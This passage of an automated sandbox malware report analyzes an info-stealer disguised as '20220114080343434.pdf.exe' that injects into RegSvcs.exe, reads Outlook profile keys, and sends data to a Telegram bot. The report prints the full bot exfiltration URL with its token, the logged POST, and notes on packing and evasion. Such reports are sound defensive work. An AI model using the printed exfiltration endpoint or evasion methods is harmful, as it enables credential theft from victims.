20220114080343434.pdf.exe, 00000001.00000003.285420297.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287326441.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287434034.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285188900.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286611235.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285434027.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287159497.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286188290.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285233567.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285483737.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284391361.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286700925.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284980871.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284169771.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284313551.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285598966.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284902558.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286321696.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285564698.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287504784.000000000575B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comeu
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288177309.0000000005774000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com-iX
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288389703.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288343797.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288218703.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288177309.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288293221.0000000005774000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comrmx
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: RegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, RegSvcs.exe, 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/
                      Source: RegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----
                      Source: RegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, RegSvcs.exe, 00000009.00000002.558692920.00000000034B8000.00000004.00000001.sdmpString found in binary or memory: https://mVBubsTSBV2T9Joj.org
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: https://mVBubsTSBV2T9Joj.org(
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, RegSvcs.exe, 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9d7774673e43dHost: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49834 version: TLS 1.2

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 20220114080343434.pdf.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 9.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 9.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 9.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 9.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 9.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 9.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 20220114080343434.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_00F0CA141_2_00F0CA14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_00F0EE701_2_00F0EE70
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_00F0EE601_2_00F0EE60
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_07077F481_2_07077F48
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_07070B141_2_07070B14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_070700061_2_07070006
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_070700401_2_07070040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01471FE09_2_01471FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014726189_2_01472618
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0147D2E09_2_0147D2E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0147F2F59_2_0147F2F5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0147B1189_2_0147B118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0147E0009_2_0147E000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01478BF09_2_01478BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016865209_2_01686520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016849989_2_01684998
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01687D909_2_01687D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016893B89_2_016893B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016816209_2_01681620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016876E09_2_016876E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0168F1129_2_0168F112
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01681DC89_2_01681DC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0168A86E9_2_0168A86E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0168A8D09_2_0168A8D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01681E689_2_01681E68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0172C3489_2_0172C348
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_017277E09_2_017277E0
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilename vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000001.00000000.281900861.0000000000382000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.309873085.0000000006EF0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\20220114080343434.pdf.exe "C:\Users\user\Desktop\20220114080343434.pdf.exe"
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\EwKDsJegaFtJBPaA
                      Source: 9.0.RegSvcs.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 9.0.RegSvcs.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 9.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 9.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 9.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 9.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 20220114080343434.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.20220114080343434.pdf.exe.380000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.20220114080343434.pdf.exe.380000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 1.2.20220114080343434.pdf.exe.380000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 1.0.20220114080343434.pdf.exe.380000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_00F06A19 push A0380289h; iretd 1_2_00F06A1E
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 1_2_07071B5D push edi; retf 1_2_07071B66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01471F32 push es; ret 9_2_01471F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01477A37 push edi; retn 0000h9_2_01477A39
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016860F0 push es; ret 9_2_01686100
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.23442041847

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                      Source: Possible double extension: pdf.exeStatic PE information: 20220114080343434.pdf.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
